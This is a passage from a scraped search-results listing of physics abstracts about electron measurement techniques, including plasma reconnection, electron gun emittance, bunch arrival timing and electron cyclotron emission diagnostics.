fundamental physical process in plasmas whereby stored magnetic energy is converted into heat and kinetic energy of charged particles. Reconnection occurs in many astrophysical plasma environments and in laboratory plasmas. Using measurements with very high time resolution, NASA's Magnetospheric Multiscale (MMS) mission has found direct evidence for electron demagnetization and acceleration at sites along the sunward boundary of Earth's magnetosphere where the interplanetary magnetic field reconnects with the terrestrial magnetic field. We have (i) observed the conversion of magnetic energy to particle energy; (ii) measured the electric field and current, which together cause the dissipation of magnetic energy; and (iii) identified the electron population that carries the current as a result of demagnetization and acceleration within the reconnection diffusion/dissipation region. 10. Emittance measurement for high-brightness electron guns International Nuclear Information System (INIS) Kobayashi, H.; Kurihara, T.; Sato, I.; Asami, A.; Yamazaki, Y.; Otani, S.; Ishizawa, Y. 1992-01-01 An emittance measurement system based on a high-precision pepper-pot technique has been developed for electron guns with low emittance of around πmm-mrad. Electron guns with a 1 mmφ cathode, the material of which is impregnated tungsten or single-crystal lanthanum hexaboride (La 1-x Ce x )B 6 , have been developed. The performance has been evaluated by putting stress on cathode roughness, which gives rise to an angular divergence, according to the precise emittance measurement system. A new type of cathode holder, which is a modified version of the so called Vogel type, was developed and the beam uniformity has been improved. (Author) 5 figs., tab., 9 refs 11. Measurement of the activity of electron capturing isotopes International Nuclear Information System (INIS) Szoerenyi, A. 1980-01-01 In order to measure precisely the activity of electron capturing isotopes, an equipment was constructed for the detection the X-photons, the Auger- and the conversing electrons by a high-pressure, gas-flow 4π proportional counter. The proportional counter and the NaI(Tl) scintillation counter are placed in a common lead-shielding, thus, the equipment is suited for the measurement of radioisotopes decaying in coincidence. The structure of the proportional counter and of the pressure-control system are detailed. As an example, the energy spectra of a 109 Cd solution, taken at different pressures, are published. At a pressure of 1.1 MPa the 3 peaks are well separated. The results of an international test, in which the radioactivity of a 57 Co sample was determined, are published, too. (L.E.) 12. Polarization Measurements in elastic electron-deuteron scattering International Nuclear Information System (INIS) Garcon, M. 1989-01-01 The deuteron electromagnetic form factors, are recalled. The experiment, recently performed in the Bates accelerator (M.I.T.), is described. The aim of the experiment is the measurement of the tensor polarization of the backscattered deuteron, in the elastic electron-deuteron scattering, up to q = 4.6 f/m. Different experimental methods, concerning the determination of this observable, are compared. Several improvement possibilities in this field are suggested 13. Quadrupole moments as measures of electron correlation in two-electron atoms International Nuclear Information System (INIS) Ceraulo, S.C.; Berry, R.S. 1991-01-01 We have calculated quadrupole moments, Q zz , of helium in several of its doubly excited states and in two of its singly excited Rydberg states, and of the alkaline-earth atoms Be, Mg, Ca, Sr, and Ba in their ground and low-lying excited states. The calculations use well-converged, frozen-core configuration-interaction (CI) wave functions and, for interpretive purposes, Hartree-Fock (HF) atomic wave functions and single-term, optimized, molecular rotor-vibrator (RV) wave functions. The quadrupole moments calculated using RV wave functions serve as a test of the validity of the correlated, moleculelike model, which has been used to describe the effects of electron correlation in these two-electron and pseudo-two-electron atoms. Likewise, the quadrupole moments calculated with HF wave functions test the validity of the independent-particle model. In addition to their predictive use and their application to testing simple models, the quadrupole moments calculated with CI wave functions reveal previously unavailable information about the electronic structure of these atoms. Experimental methods by which these quadrupole moments might be measured are also discussed. The quadrupole moments computed from CI wave functions are presented as predictions; measurements of Q zz have been made for only two singly excited Rydberg states of He, and a value of Q zz has been computed previously for only one of the states reported here. We present these results in the hope of stimulating others to measure some of these quadrupole moments 14. Active silicon x-ray for measuring electron temperature International Nuclear Information System (INIS) Snider, R.T. 1994-07-01 Silicon diodes are commonly used for x-ray measurements in the soft x-ray region between a few hundred ev and 20 keV. Recent work by Cho has shown that the charge collecting region in an underbiased silicon detector is the depletion depth plus some contribution from a region near the depleted region due to charge-diffusion. The depletion depth can be fully characterized as a function of the applied bias voltage and is roughly proportional to the squart root of the bias voltage. We propose a technique to exploit this effect to use the silicon within the detector as an actively controlled x-ray filter. With reasonable silicon manufacturing methods, a silicon diode detector can be constructed in which the sensitivity of the collected charge to the impinging photon energy spectrum can be changed dynamically in the visible to above the 20 keV range. This type of detector could be used to measure the electron temperature in, for example, a tokamak plasma by sweeping the applied bias voltage during a plasma discharge. The detector samples different parts of the energy spectrum during the bias sweep, and the data collected contains enough information to determine the electron temperature. Benefits and limitations of this technique will be discussed along with comparisons to similar methods for measuring electron temperature and other applications of an active silicon x-ray filter 15. Precision Electron Density Measurements in the SSX MHD Wind Tunnel Science.gov (United States) Suen-Lewis, Emma M.; Barbano, Luke J.; Shrock, Jaron E.; Kaur, Manjit; Schaffner, David A.; Brown, Michael R. 2017-10-01 We characterize fluctuations of the line averaged electron density of Taylor states produced by the magnetized coaxial plasma gun of the SSX device using a 632.8 nm HeNe laser interferometer. The analysis method uses the electron density dependence of the refractive index of the plasma to determine the electron density of the Taylor states. Typical magnetic field and density values in the SSX device approach about B ≅ 0.3 T and n = 0 . 4 ×1016 cm-3 . Analysis is improved from previous density measurement methods by developing a post-processing method to remove relative phase error between interferometer outputs and to account for approximately linear phase drift due to low-frequency mechanical vibrations of the interferometer. Precision density measurements coupled with local measurements of the magnetic field will allow us to characterize the wave composition of SSX plasma via density vs. magnetic field correlation analysis, and compare the wave composition of SSX plasma with that of the solar wind. Preliminary results indicate that density and magnetic field appear negatively correlated. Work supported by DOE ARPA-E ALPHA program. 16. Measuring the electron-ion ring parameters by bremsstrahlung International Nuclear Information System (INIS) Inkin, V.D.; Mozelev, A.A.; Sarantsev, V.P. 1982-01-01 A system is described for measuring the number of electrons and ions in the electron-ion rings of a collective heavy ion accelerator. The system operation is based on detecting gamma quanta of bremsstrahlung following the ring electron interaction with the nuclei of neutral atoms and ions at different stages of filling the ring with ions. The radiation detector is a scintillation block - a photomultiplier operating for counting with NaI(Tl) crystal sized 30x30 mm and ensuring the detection efficiency close to unity. The system apparatus is made in the CAMAC standard and rems on-line with the TRA/i miniature computer. The block-diagrams of the system and algorithm of data processing are presented. A conclusion is drawn that the results of measuring the ring parameters with the use of the diagnostics system described are in good agreement within the range of measuring errors with those obtained by means of the diagnostics system employing synchrotron radiation and induction sensors 17. Timing jitter measurements at the SLC electron source International Nuclear Information System (INIS) Sodja, J.; Browne, M.J.; Clendenin, J.E. 1989-03-01 The SLC thermionic gun and electron source produce a beam of up to 15 /times/ 10 10 /sub e//minus/ in a single S-band bunch. A 170 keV, 2 ns FWHM pulse out of the gun is compressed by means of two subharmonic buncher cavities followed by an S-band buncher and a standard SLAC accelerating section. Ceramic gaps in the beam pipe at the output of the gun allow a measure of the beam intensity and timing. A measurement at these gaps of the timing jitter, with a resolution of <10 ps, is described. 3 refs., 5 figs 18. Fabrication and electric measurements of nanostructures inside transmission electron microscope. Science.gov (United States) Chen, Qing; Peng, Lian-Mao 2011-06-01 Using manipulation holders specially designed for transmission electron microscope (TEM), nanostructures can be characterized, measured, modified and even fabricated in-situ. In-situ TEM techniques not only enable real-time study of structure-property relationships of materials at atomic scale, but also provide the ability to control and manipulate materials and structures at nanoscale. This review highlights in-situ electric measurements and in-situ fabrication and structure modification using manipulation holder inside TEM. Copyright © 2011 Elsevier B.V. All rights reserved. 19. Electronic property measurements for piezoelectric ceramics. Technical notes International Nuclear Information System (INIS) Cain, M.; Stewart, M.; Gee, M. 1998-01-01 A series of measurement notes are presented, with emphasis placed on the technical nature of the testing methodology, for the determination of key electronic properties for piezoelectric ceramic materials that are used as sensors and actuators. The report is segmented into 'sections' that may be read independently from the rest of the report. The following measurement issues are discussed: Polarisation/Electric field (PE) loop measurements including a discussion of commercial and an in-house constructed system that measures PE loops; Dielectric measurements at low and high stress application, including some thermal and stress dependency modelling of piezo materials properties, developed at NPL; Strain measurement techniques developed at CMMT; Charge measurement techniques suitable for PE loop and other data acquisition; PE loop measurement and software analysis developed at CMMT and Manchester University. The primary objective of this report is to provide a framework on which the remainder of the testing procedures are to be developed for measurements of piezoelectric properties at high stress and stress rate. These procedures will be the subject of a future publication. (author) 20. Electron spectroscopic evidence of electron correlation in Ni-Pt alloys: comparison with specific heat measurement CERN Document Server Nahm, T U; Kim, J Y; Oh, S J 2003-01-01 We have performed photoemission spectroscopy of Ni-Pt alloys to understand the origin of the discrepancy between the experimental linear coefficient of specific heat gamma and that predicted by band theory. We found that the quasiparticle density of states at the Fermi level deduced from photoemission measurement is in agreement with the experimental value of gamma, if we include the electron correlation effect. It was also found that the Ni 2p core level satellite intensity increases as Ni content is reduced, indicating a strong electron correlation effect which can enhance the quasiparticle effective mass considerably. This supports our conclusion that electron correlation is the most probable reason of disagreement of gamma between experiment and band theory. 1. Simultaneous integral measurement of electron energy and charge albedoes International Nuclear Information System (INIS) Lockwood, G.J.; Miller, G.H.; Halbleib, J.A. Sr. Results of a series of experiments in which backscattered energy has been determined from precise energy deposition measurements using an improved technique are presented. The fraction of the energy backscattered for electrons incident on Be, Ti, Mo, and Ta is determined as a function of energy and angle of incidence. The improved technique for the absolute measurement of energy deposition using calorimeters involves square-wave (on-off) modulation of the beam. Uncertainties in the measured backscattered energy are 1 to 6 percent, except for Be at normal incidence where they must agree by definition. Experiment and theory agree quite well for Mo and Be at 60 0 . The measured data for Ta and Ti are clearly higher than the calculated results, which is not completely understood. (U.S.) 2. Proposal on electron anti-neutrino mass measurement at INS International Nuclear Information System (INIS) Ohshima, Takayoshi. 1981-03-01 Some comment on the proposed experiment, namely the measurement of electron anti-neutrino mass, is described. Various experiments with the measurement of β-ray from tritium have been reported. The precise measurement of the shape of the Kurie plot is required in this kind of experiment. The present experiment aimed at more accurate determination of neutrino mass than any other previous ones. An important point of the present experiment is to reduce the background due to the β-ray from evaporating tritium. The source candidates have low evaporation rate. A double focus √2π air core spectrometer is employed for the measurement of β-ray. The spectrometer was improved to meet the present purpose. The accumulated event rate was expected to be about 10 times higher than Russian experiment. The estimated energy resolution was about 30 eV. The neutrino mass with less than 10 eV accuracy will be obtained. (Kato, T.) 3. Orbital electron capture measurements with an internal-source spectrometer International Nuclear Information System (INIS) Gerner, C.P. 1978-01-01 Electron-capture measurements have been performed on 131 Ba and on 106 Agsup(m). For 131 Ba the L/K-and M/L-capture rations of the allowed decay have been measured to the 1048 keV level in 131 Cs. The Qsub(EC) value, the exchange- and overlap-correction factors Xsup(L/K) and Xsup(M/L) and the reduced capture ratios have been determined. For 106 Agsup(m) the L/K-capture ratio of the allowed decay has been measured to the 2757 keV level in 106 Pd. The Q value, the exchange- and overlap-correction factor Xsup(L/K) and the reduced L/K- capture ratio have been derived. The measurements indicate that agreement between experimentally determined capture ratios and exchange-corrected theoretical predictions is fairly good, both for allowed and for first-forbidden non-unique transitions. (Auth./C.F.) 4. Measuring the electron bunch timing with femtosecond resolution at FLASH International Nuclear Information System (INIS) Bock, Marie Kristin 2013-03-01 Bunch arrival time monitors (BAMs) are an integral part of the laser-based synchronisation system which is being developed at the Free Electron Laser in Hamburg (FLASH).The operation principle comprises the measurement of the electron bunch arrival time relative to the optical timing reference, which is provided by actively length-stabilised fibre-links of the synchronisation system. The monitors are foreseen to be used as a standard diagnostic tool, not only for FLASH but also for the future European X-Ray Free-Electron Laser (European XFEL). The present bunch arrival time monitors have evolved from proof-of-principle experiments to beneficial diagnostic devices, which are almost permanently available during standard machine operation. This achievement has been a major objective of this thesis. The developments went in parallel to improvements in the reliable and low-maintenance operation of the optical synchronisation system. The key topics of this thesis comprised the characterisation and optimisation of the opto-mechanical front-ends of both, the fibre-links and the BAMs. The extent of applications involving the bunch arrival time information has been enlarged, providing automated measurements for properties of the RF acceleration modules, for instance, the RF on-crest phase determination and the measurement of energy fluctuations. Furthermore, two of the currently installed BAMs are implemented in an active phase and gradient stabilisation of specific modules in order to minimise the arrival time jitter of the electron bunches at the location of the FEL undulators, which is crucial for a high timing resolution of pump-probe experiments. 5. Measuring the electron bunch timing with femtosecond resolution at FLASH Energy Technology Data Exchange (ETDEWEB) Bock, Marie Kristin 2013-03-15 Bunch arrival time monitors (BAMs) are an integral part of the laser-based synchronisation system which is being developed at the Free Electron Laser in Hamburg (FLASH).The operation principle comprises the measurement of the electron bunch arrival time relative to the optical timing reference, which is provided by actively length-stabilised fibre-links of the synchronisation system. The monitors are foreseen to be used as a standard diagnostic tool, not only for FLASH but also for the future European X-Ray Free-Electron Laser (European XFEL). The present bunch arrival time monitors have evolved from proof-of-principle experiments to beneficial diagnostic devices, which are almost permanently available during standard machine operation. This achievement has been a major objective of this thesis. The developments went in parallel to improvements in the reliable and low-maintenance operation of the optical synchronisation system. The key topics of this thesis comprised the characterisation and optimisation of the opto-mechanical front-ends of both, the fibre-links and the BAMs. The extent of applications involving the bunch arrival time information has been enlarged, providing automated measurements for properties of the RF acceleration modules, for instance, the RF on-crest phase determination and the measurement of energy fluctuations. Furthermore, two of the currently installed BAMs are implemented in an active phase and gradient stabilisation of specific modules in order to minimise the arrival time jitter of the electron bunches at the location of the FEL undulators, which is crucial for a high timing resolution of pump-probe experiments. 6. Emittance Measurements from a Laser Driven Electron Injector CERN Document Server Reis, D 2003-01-01 The Gun Test Facility (GTF) at the Stanford Linear Accelerator Center was constructed to develop an appropriate electron beam suitable for driving a short wavelength free electron laser (FEL) such as the proposed Linac Coherent Light Source (LCLS). For operation at a wavelength of 1.5 (angstrom), the LCLS requires an electron injector that can produce an electron beam with approximately 1 pi mm-mrad normalized rms emittance with at least 1 nC of charge in a 10 ps or shorter bunch. The GTF consists of a photocathode rf gun, emittance-compensation solenoid, 3 m linear accelerator (linac), drive laser, and diagnostics to measure the beam. The rf gun is a symmetrized 1.6 cell, s-band high gradient, room temperature, photocathode structure. Simulations show that this gun when driven by a temporally and spatially shaped drive laser, appropriately focused with the solenoid, and further accelerated in linac can produce a beam that meets the LCLS requirements. This thesis describes the initial characterization of the ... 7. Measurement of the electron quenching rate in an electron beam pumped KrF* laser International Nuclear Information System (INIS) Nishioka, Hajime; Kurashima, Toshio; Kuranishi, Hideaki; Ueda, Kenichi; Takuma, Hiroshi; Sasaki, Akira; Kasuya, Koichi. 1988-01-01 The electron quenching rate of KrF * in an electron beam pumped laser has been studied by accurately measuring the saturation intensity in a mixture of Ar/Kr/F 2 = 94/6/0.284. The input intensity of the measurements was widely varied from 100 W cm -2 (small signal region) to 100 MW cm -2 (absorption dominant region) in order to separate laser parameters which are small signal gain coefficient, absorption coefficient, and saturation intensity from the measured net gain coefficients. The gas pressure and the pump rate were varied in the range of 0.5 to 2.5 atm and 0.3 to 1.4 MW cm -3 , respectively. The electron quenching rate constant of 4.5 x 10 -7 cm 3 s -1 was obtained from the pressure and the pump rate dependence of the KrF * saturation intensity with the temperature dependence of the rate gas 3-body quenching rate as a function of gas temperature to the -3rd power. The small signal gain coefficients calculated with the determined quenching rate constants shows excellent agreement with the measurements. (author) 8. Measurement of the electron quenching rate in an electron beam pumped KrF/sup */ laser Energy Technology Data Exchange (ETDEWEB) Nishioka, Hajime; Kurashima, Toshio; Kuranishi, Hideaki; Ueda, Kenichi; Takuma, Hiroshi; Sasaki, Akira; Kasuya, Koichi. 1988-09-01 The electron quenching rate of KrF/sup */ in an electron beam pumped laser has been studied by accurately measuring the saturation intensity in a mixture of Ar/Kr/F/sub 2/ = 94/6/0.284. The input intensity of the measurements was widely varied from 100 W cm/sup -2/ (small signal region) to 100 MW cm/sup -2/ (absorption dominant region) in order to separate laser parameters which are small signal gain coefficient, absorption coefficient, and saturation intensity from the measured net gain coefficients. The gas pressure and the pump rate were varied in the range of 0.5 to 2.5 atm and 0.3 to 1.4 MW cm/sup -3/, respectively. The electron quenching rate constant of 4.5 x 10/sup -7/ cm/sup 3/s/sup -1/ was obtained from the pressure and the pump rate dependence of the KrF/sup */ saturation intensity with the temperature dependence of the rate gas 3-body quenching rate as a function of gas temperature to the -3rd power. The small signal gain coefficients calculated with the determined quenching rate constants shows excellent agreement with the measurements. 9. Detecting Electron Transport of Amino Acids by Using Conductance Measurement Directory of Open Access Journals (Sweden) Wei-Qiong Li 2017-04-01 Full Text Available The single molecular conductance of amino acids was measured by a scanning tunneling microscope (STM break junction. Conductance measurement of alanine gives out two conductance values at 10−1.85 G0 (1095 nS and 10−3.7 G0 (15.5 nS, while similar conductance values are also observed for aspartic acid and glutamic acid, which have one more carboxylic acid group compared with alanine. This may show that the backbone of NH2–C–COOH is the primary means of electron transport in the molecular junction of aspartic acid and glutamic acid. However, NH2–C–COOH is not the primary means of electron transport in the methionine junction, which may be caused by the strong interaction of the Au–SMe (methyl sulfide bond for the methionine junction. The current work reveals the important role of the anchoring group in the electron transport in different amino acids junctions. 10. Band rejection filter for measurement of electron cyclotron emission during electron cyclotron heating International Nuclear Information System (INIS) Iwase, Makoto; Ohkubo, Kunizo; Kubo, Shin; Idei, Hiroshi. 1996-05-01 For the measurement of electron cyclotron emission from the high temperature plasma, a band rejection filter in the range of 40-60 GHz is designed to reject the 53.2 GHz signal with large amplitude from the gyrotron for the purpose of plasma electron heating. The filter developed with ten sets of three quarters-wavelength coupled by TE 111 mode of tunable resonant cavity has rejection of 50 dB and 3 dB bandwidth of 500 MHz. The modified model of Tschebysheff type for the prediction of rejection is proposed. It is confirmed that the measured rejection as a function of frequency agrees well with the experimental results for small coupling hole, and also clarified that the rejection ratio increases for the large coupling hole. (author) 11. Measurement of Deuteron Tensor Polarization in Elastic Electron Scattering Energy Technology Data Exchange (ETDEWEB) Gustafsson, Kenneth K. [Univ. of Maryland, College Park, MD (United States) 2000-01-01 Nuclear physics traces it roots back to the very beginning of the last century. The concept of the nuclear atom was introduced by Rutherford around 1910. The discovery of the neutron Chadwick in 1932 gave us the concept of two nucleons: the proton and the neutron. The Jlab electron accelerator with its intermediate energy high current continuous wave beam combined with the Hall C high resolution electron spectrometer and a deutron recoil polarimeter provided experiment E94018 with the opportunity to study the deuteron electomagnetic structure, in particular to measure the tensor polarization observable t20, at high four momentum transfers than ever before. This dissertation presents results of JLab experiment E94018. 12. Electronics/avionics integrity - Definition, measurement and improvement Science.gov (United States) Kolarik, W.; Rasty, J.; Chen, M.; Kim, Y. The authors report on the results obtained from an extensive, three-fold research project: (1) to search the open quality and reliability literature for documented information relative to electronics/avionics integrity; (2) to interpret and evaluate the literature as to significant concepts, strategies, and tools appropriate for use in electronics/avionics product and process integrity efforts; and (3) to develop a list of critical findings and recommendations that will lead to significant progress in product integrity definition, measurement, modeling, and improvements. The research consisted of examining a broad range of trade journals, scientific journals, and technical reports, as well as face-to-face discussions with reliability professionals. Ten significant recommendations have been supported by the research work. 13. Automatic solar image motion measurements. [electronic disk flux monitoring Science.gov (United States) Colgate, S. A.; Moore, E. P. 1975-01-01 The solar seeing image motion has been monitored electronically and absolutely with a 25 cm telescope at three sites along the ridge at the southern end of the Magdalena Mountains west of Socorro, New Mexico. The uncorrelated component of the variations of the optical flux from two points at opposite limbs of the solar disk was continually monitored in 3 frequencies centered at 0.3, 3 and 30 Hz. The frequency band of maximum signal centered at 3 Hz showed the average absolute value of image motion to be somewhat less than 2sec. The observer estimates of combined blurring and image motion were well correlated with electronically measured image motion, but the observer estimates gave a factor 2 larger value. 14. Ultrashort electron bunch length measurement with diffraction radiation deflector Science.gov (United States) Xiang, Dao; Huang, Wen-Hui 2007-01-01 In this paper, we propose a novel method to measure electron bunch length with a diffraction radiation (DR) deflector which is composed of a DR radiator and three beam position monitors (BPMs). When an electron beam passes through a metallic aperture which is tilted by 45 degrees with respect to its trajectory, backward DR that propagates perpendicular to the beam’s trajectory is generated which adds a transverse deflection to the beam as a result of momentum conservation. The deflection is found to be largely dependent on the bunch length and could be easily observed with a downstream BPM. Detailed investigations show that this method has wide applicability, high temporal resolution, and great simplicity. 15. Ultrashort electron bunch length measurement with diffraction radiation deflector Directory of Open Access Journals (Sweden) Dao Xiang 2007-01-01 Full Text Available In this paper, we propose a novel method to measure electron bunch length with a diffraction radiation (DR deflector which is composed of a DR radiator and three beam position monitors (BPMs. When an electron beam passes through a metallic aperture which is tilted by 45 degrees with respect to its trajectory, backward DR that propagates perpendicular to the beam’s trajectory is generated which adds a transverse deflection to the beam as a result of momentum conservation. The deflection is found to be largely dependent on the bunch length and could be easily observed with a downstream BPM. Detailed investigations show that this method has wide applicability, high temporal resolution, and great simplicity. 16. Electronic temperature control and measurements reactor fuel rig circuits Energy Technology Data Exchange (ETDEWEB) Glowacki, S W 1980-01-01 The electronic circuits of two digital temperature meters developed for the thermocouple of Ni-NiCr type are described. The output thermocouple signal as converted by means of voltage-to-freguency converter. The frequency is measured by a digital scaler controled by quartz generator signals. One of the described meter is coupled with digital temperature controler which drives the power stage of the reactor rig heater. The internal rig temperature is measured by the thermocouple providing the input signal to the mentioned voltage-to-frequency converter, that means the circuits work in the negative feedback loop. The converter frequency-to-voltage ratio is automatically adjusted to match to thermocouple sensitivity changes in the course of the temperature variations. The accuracy of measuring system is of order of +- 1degC for thermocouple temperature changes from 523 K up to 973 K (50degC up to 700degC). 17. The electronic temperature control and measurements reactor fuel rig circuits International Nuclear Information System (INIS) Glowacki, S.W. 1980-01-01 The electronic circuits of two digital temperature meters developed for the thermocouple of Ni-NiCr type are described. The output thermocouple signal as converted by means of voltage-to-freguency converter. The frequency is measured by a digital scaler controled by quartz generator signals. One of the described meter is coupled with digital temperature controler which drives the power stage of the reactor rig heater. The internal rig temperature is measured by the thermocouple providing the input signal to the mentioned voltage-to-frequency converter, that means the circuits work in the negative feedback loop. The converter frequency-to-voltage ratio is automatically adjusted to match to thermocouple sensitivity changes in the course of the temperature variations. The accuracy of measuring system is of order of +- 1degC for thermocouple temperature changes from 523 K up to 973 K (50degC up to 700degC). (author) 18. Quantitative convergent beam electron diffraction measurements of bonding in alumina International Nuclear Information System (INIS) Johnson, A.W.S. 2002-01-01 Full text: The QCBED technique of measuring accurate structure factors has been made practical by advances in energy filtering, computing and in the accurate measurement of intensity. Originally attempted in 1965 by the late Peter Goodman (CSIRO, Melbourne) while working with Gunter Lehmpfuhl (Fritz Haber Institut, Berlin), QCBED has been successfully developed and tested in the last decade on simple structures such as Si and MgO. Our work on Alumina is a step up in complexity and has shown that extinction in X-ray diffraction is not correctable to the precision required. In combination with accurate X-ray diffraction, QCBED promises to revolutionize the accuracy of bonding charge density measurements, experimental results which are of significance in the development of Density Functional Theory used in predictive chemistry. Copyright (2002) Australian Society for Electron Microscopy Inc 19. Fabrication and electric measurements of nanostructures inside transmission electron microscope International Nuclear Information System (INIS) Chen, Qing; Peng, Lian-Mao 2011-01-01 Using manipulation holders specially designed for transmission electron microscope (TEM), nanostructures can be characterized, measured, modified and even fabricated in-situ. In-situ TEM techniques not only enable real-time study of structure-property relationships of materials at atomic scale, but also provide the ability to control and manipulate materials and structures at nanoscale. This review highlights in-situ electric measurements and in-situ fabrication and structure modification using manipulation holder inside TEM. -- Research highlights: → We review in-situ works using manipulation holder in TEM. → In-situ electric measurements, fabrication and structure modification are focused. → We discuss important issues that should be considered for reliable results. → In-situ TEM is becoming a very powerful tool for many research fields. 20. Spatial variations in the suprathermal ion distributions during substorms in the plasma sheet International Nuclear Information System (INIS) Kistler, L.M.; Moebius, E.; Klecker, B.; Gloeckler, G.; Ipavich, F.M.; Hamilton, D.C. 1990-01-01 Using data from AMPTE IRM and AMPTE CCE, the authors have determined the pre- and post-injection suprathermal energy spectra for the ion species H + , O + , He + , and He ++ for six events in which substorm-associated particle injections are observed in both the near-Earth plasma sheet and farther down the tail. They find similar spectral changes in both locations, with the spectra becoming harder with the injection. Post-injection, the flux decreases exponentially with radial distance. Approximately the same gradient is observed in all species. In addition, they find that although the O + /H + and the He ++ /H + ratios increase with energy per charge, the ratios are approximately the same at the same energy per charge at the two spacecraft. The observations are difficult to explain either with a model in which the ions are accelerated at a neutral line and transported toward Earth or with a model in which the ions are accelerated in the near-Earth region by current disruption/diversion and transported down the tail. In either case, the ions would have to be transported throughout the tail without much energization or deenergization in order to explain the energy per charge correlations. Further, earthward transport without energization would not lead to the observed radial gradient. A combination of these acceleration mechanisms, a disturbance that propagates throughout the plasma sheet, or a more global mechanism may explain the observations 1. 2nd International Conference on Measurement Instrumentation and Electronics International Nuclear Information System (INIS) 2017-01-01 Preface It is our great pleasure to welcome you to 2017 2nd International Conference on Measurement Instrumentation and Electronics which has been held in Prague, Czech Republic during June 9-11, 2017. ICMIE 2017 is dedicated to issues related to measurement instrumentation and electronics. The major goal and feature of the conference is to bring academic scientists, engineers, industry researchers together to exchange and share their experiences and research results, and discuss the practical challenges encountered and the solutions adopted. Professors from Czech Republic, Germany and Italy are invited to deliver keynote speeches regarding latest information in their respective expertise areas. It is a golden opportunity for the students, researchers and engineers to interact with the experts and specialists to get their advice or consultation on technical matters, teaching methods and strategies. These proceedings present a selection from papers submitted to the conference from universities, research institutes and industries. All of the papers were subjected to peer-review by conference committee members and international reviewers. The papers selected depended on their quality and their relevancy to the conference. The volume tends to present to the readers the recent advances in the field of computer and communication system, system design and measurement and control technology, power electronics and electrical engineering, materials science and engineering, power machinery and equipment maintenance, architectural design and project management, environmental analysis and detection etc. We would like to thank all the authors who have contributed to this volume and also to the organizing committee, reviewers, speakers, chairpersons, and all the conference participants for their support to ICMIE 2017. ICMIE 2017 Organizing Committee June 20th, 2017 (paper) 2. Measurement of few-electron uranium ions on a high-energy electron beam ion trap International Nuclear Information System (INIS) Beiersdorfer, P. 1994-01-01 The high-energy electron beam ion trap, dubbed Super-EBIT, was used to produce, trap, and excite uranium ions as highly charged as fully stripped U 92+ . The production of such highly charged ions was indicated by the x-ray emission observed with high-purity Ge detectors. Moreover, high-resolution Bragg crystal spectromters were used to analyze the x-ray emission, including a detailed measurement of both the 2s 1/2 -2p 3/2 electric dipole and 2p 1/2 -2p 3/2 magnetic dipole transitions. Unlike in ion accelerators, where the uranium ions move at relativistic speeds, the ions in this trap are stationary. Thus very precise measurements of the transition energies could be made, and the QED contribution to the transition energies could be measured within less than 1 %. Details of the production of these highly charged ions and their measurement is given 3. Recent measurements concerning uranium hexafluoride-electron collision processes International Nuclear Information System (INIS) Trajmar, S.; Chutjian, A.; Srivastava, S.; Williams, W.; Cartwright, D.C. 1976-01-01 Scattering of electrons by UF 6 molecule was studied at impact energies ranging from 5 to 100 eV and momentum transfer, elastic and inelastic scattering cross sections were determined. The measurements also yielded spectroscopic information which made possible to extend the optical absorption cross sections from 2000 to 435A. It was found that UF 6 is a very strong absorber in the vacuum UV region. No transitions were found to lie below the onset of the optically detected 3.0 eV feature 4. Comparison of Electron Imaging Modes for Dimensional Measurements in the Scanning Electron Microscope. Science.gov (United States) Postek, Michael T; Vladár, András E; Villarrubia, John S; Muto, Atsushi 2016-08-01 Dimensional measurements from secondary electron (SE) images were compared with those from backscattered electron (BSE) and low-loss electron (LLE) images. With the commonly used 50% threshold criterion, the lines consistently appeared larger in the SE images. As the images were acquired simultaneously by an instrument with the capability to operate detectors for both signals at the same time, the differences cannot be explained by the assumption that contamination or drift between images affected the SE, BSE, or LLE images differently. Simulations with JMONSEL, an electron microscope simulator, indicate that the nanometer-scale differences observed on this sample can be explained by the different convolution effects of a beam with finite size on signals with different symmetry (the SE signal's characteristic peak versus the BSE or LLE signal's characteristic step). This effect is too small to explain the >100 nm discrepancies that were observed in earlier work on different samples. Additional modeling indicates that those discrepancies can be explained by the much larger sidewall angles of the earlier samples, coupled with the different response of SE versus BSE/LLE profiles to such wall angles. 5. Electron temperature measurements during electron cyclotron heating on PDX using a ten channel grating polychromator International Nuclear Information System (INIS) Cavallo, A.; Hsuan, H.; Boyd, D.; Grek, B.; Johnson, D.; Kritz, A.; Mikkelsen, D.; LeBlanc, B.; Takahashi, H. 1984-10-01 During first harmonic electron cyclotron heating (ECH) on the Princeton Divertor Experiment (PDX) (R 0 = 137 cm, a = 40 cm), electron temperature was monitored using a grating polychromator which measured second harmonic electron cyclotron emission from the low field side of the tokamak. Interference from the high power heating pulse on the broadband detectors in the grating instrument was eliminated by using a waveguide filter in the transmission line which brought the emission signal to the grating instrument. Off-axis (approx. 4 cm) location of the resonance zone resulted in heating without sawtooth or m = 1 activity. However, heating with the resonance zone at the plasma center caused very large amplitude sawteeth accompanied by strong m = 1 activity: ΔT/T/sub MAX/ approx. = 0.41, sawtooth period approx. = 4 msec, m = 1 period approx. = 90 μ sec, (11 kHz). This is the first time such intense MHD activity driven by ECH has been observed. (For both cases there was no sawtooth activity in the ohmic phase of the discharge before ECH.) At very low densities there is a clear indication that a superthermal electron population is created during ECH 6. Electron density fluctuation measurements in the TORTUR tokamak International Nuclear Information System (INIS) Remkes, G.J.J. 1990-01-01 This thesis deals with measurements of electron-density fluctuations in the TORTUR tokamak. These measurements are carried out by making use of collective scattering of electromagnetic beams. The choice of the wavelength of the probing beam used in collective scattering experiments has important consequences. in this thesis it is argued that the best choice for a wavelength lies in the region 0.1 - 1 mm. Because sources in this region were not disposable a 2 mm collective scattering apparatus has been used as a fair compromise. The scattering theory, somewhat adapted to the specific TORTUR situation, is discussed in Ch. 2. Large scattering angles are admitted in scattering experiments with 2 mm probing beams. This had consequences for the spatial response functions. Special attention has been paid to the wave number resolution. Expressions for the minimum source power have been determined for two detection techniques. The design and implementation of the scattering apparatus has been described in Ch. 3. The available location of the scattering volume and values of the scattering angle have been determined. The effect of beam deflection due to refraction effects is evaluated. The electronic system is introduced. Ch. 4 presents the results of measurements of density fluctuations in the TORTUR tokamak in the frequency range 1 kHz to 100 MHz end the wave number region 400 - 4000 m -1 in different regions of the plasma. Correlation between density and magnetic fluctuations has been found in a number of cases. During the current decay at the termination of several plasma discharges minor disruptions occurred. The fluctuations during these disruptions have been monitored. Measurements have been performed in hydrogen as well as deuterium. A possible dependence of the wave number on the ion gyroradius has been investigated. The isotropy of the fluctuations in the poloidal plane was investigated. A theoretical discussion of the measured results is given in ch. 5. ( H.W.). 63 7. Electron cyclotron beam measurement system in the Large Helical Device Energy Technology Data Exchange (ETDEWEB) Kamio, S., E-mail: [email protected]; Takahashi, H.; Kubo, S.; Shimozuma, T.; Yoshimura, Y.; 